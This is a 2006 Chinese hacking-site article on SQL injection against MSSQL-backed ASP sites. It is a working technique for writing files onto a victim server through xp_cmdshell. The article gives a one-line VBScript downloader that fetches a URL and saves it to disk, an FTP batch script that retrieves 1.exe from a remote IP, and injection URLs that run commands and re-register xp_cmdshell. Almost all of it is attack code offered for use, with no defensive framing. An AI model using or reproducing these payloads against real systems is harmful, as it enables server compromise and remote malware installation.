频道栏目
首页 > 安全 > 网站安全 > 正文

mssql注射中多次调用参数导致多次echo的解决方法

2006-08-07 06:47:52           
收藏   我要投稿

文/superhei
解决办法:
1.iget.vbs一次写入
在vbs语句的接触是符号是: 所以我们iget.vbs可以这样写

Set x= CreateObject("Microsoft.XMLHTTP"):x.Open "GET",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject("ADODB.Stream"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2

这样我们可以一次echo成功,echo版本:

echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >iget.vbs


2.bat调用ftp脚本的写法(by envymask)

echo ftp>1.vbs
echo open ip>2.vbs
echo u>3.vbs
echo s>4.vbs
echo binary>5.vbs
echo get 1.exe>6.vbs
echo bay>7.vbs

copy 1.vbs+2.vbs+3.vbs+4.vbs+5.vbs+6.vbs+7.vbs new.vbs

3.解决方法by xiaolu

http://xxx.com/x.asp?id=1;Exec Master..xp_cmdshell echo xxxx1 > xxx.vbs;exec master..sp_dropextendedproc xp_cmdshell--
http://xxx.com/x.asp?id=1;use master dbcc addextendedproc(xp_cmdshell,xplog70.dll)--
http://xxx.com/x.asp?id=1;Exec Master..xp_cmdshell echo xxxx2 >> xxx.vbs;exec master..sp_dropextendedproc xp_cmdshell--
http://xxx.com/x.asp?id=1;use master dbcc addextendedproc(xp_cmdshell,xplog70.dll)--

相关TAG标签 参数 方法
上一篇:高手过招:全程追踪检测JSP网站服务器
下一篇:推荐:嗜酒成痴剑亦狂--重燃你的Php安全之火
相关文章
图文推荐
文章
推荐
热门新闻

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站